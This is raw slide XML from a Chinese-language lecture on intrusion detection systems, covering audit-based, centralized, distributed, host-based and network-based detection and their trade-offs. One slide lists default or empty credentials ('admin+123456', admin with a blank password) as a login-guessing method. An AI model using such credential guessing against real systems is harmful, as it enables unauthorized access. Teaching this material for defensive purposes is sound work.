              <a:off x="7920" y="8148"/>
              <a:ext cx="0" cy="6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76" name="Line 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D48BD323-C74A-4033-902D-438BDF9AA3BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5220" y="3780"/>
              <a:ext cx="27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577" name="Line 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B22380-BAF4-4EDC-9798-C9A2C3CFE1C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7920" y="3780"/>
              <a:ext cx="0" cy="35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1578" name="Rectangle 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF80F34-F089-440F-95D5-50D0B46B0C88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3960" y="3000"/>
              <a:ext cx="12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1200">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>审计记录</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="151579" name="Rectangle 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1D414A7-DAFF-450C-BEB4-82A1040B7DDD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2160" y="9708"/>
              <a:ext cx="6120"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800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>基于审计的入侵检测系统结构示意图</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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AC1956C4-4C05-4D1F-9D64-37315AAB6193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>集中式检测的优缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152579" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265C7798-A1C5-465C-8F3F-4629028A565D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2133600"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>不会降低目标机的性能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>统计行为信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>多主机标志、用于支持起诉的原始数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>不能进行实时检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>不能实时响应</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>影响网络通信量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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3326C541-4EAB-4A8B-8511-7AF1178BF0B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>分布式检测的优缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153603" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEB1E8C-15C2-464F-9072-13F3BC2088DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>实时告警</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>实时响应</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>缺点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>降低目标机的性能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>没有统计行为信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>没有多主机标志</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>没有用于支持起诉的原始数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>降低了数据的辨析能力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>系统离线时不能分析数据</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966201A9-A693-47FB-BC8D-F7BDCFCD64A4}"/>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B0AD3E0A-7392-4409-92D8-402792F82597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="307975" y="2058988"/>
            <a:ext cx="8704263" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>方法一：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>      admin+123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>，或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>admin+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>空口令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="AutoShape 4" descr="安全警示牌注意安全设计元素素材免费下载(图片编号:9340003)-六图网">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60CC3FDE-BABE-4822-8D44-29CEB5B966DE}"/>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p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93159123-C499-4F08-BE41-AEB6B80D5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3586163"/>
            <a:ext cx="849313"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157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BC2DC9AF-48F5-41F1-99A9-E21120919E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>操作模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154627" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D1C1CB5-5E41-424B-8D5A-0FBB55E520BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>操作主机入侵检测系统的方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>警告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>监视</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>毁坏情况评估</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>遵从性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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0" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34D5A12B-4F87-4EEE-BBD9-69B105C4FB41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于主机的技术面临的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843DA4AB-5202-40C3-BF3F-F061704D7B71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>性能：降低是不可避免的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>部署</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
              <a:t>维护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09073334-C74A-41A1-A2E6-4A5C7C0471F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于网络的入侵检测系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156675" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5868A2F4-20B3-45D5-8F05-7390DB18F1A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2286000"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>入侵检测系统分析网络数据包</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>基于网络的检测威胁</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>基于网络的结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>优点及问题</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42BC4C6-7638-4B6B-84BC-52EF9FEFB894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于网络的检测威胁</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157699" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE11331-391C-4086-8DEF-2EE8A8358783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2209800"/>
            <a:ext cx="7772400" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>非授权访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>资源的窃取</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1"/>
              <a:t>拒绝服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow"/>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722" name="Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761D410B-6AA9-4621-BAFB-BF19B81089A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>基于网络的入侵检测系统结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158723" name="Rectangle 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2003A04D-0CCC-42BA-B0E8-90C2E39DE6D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
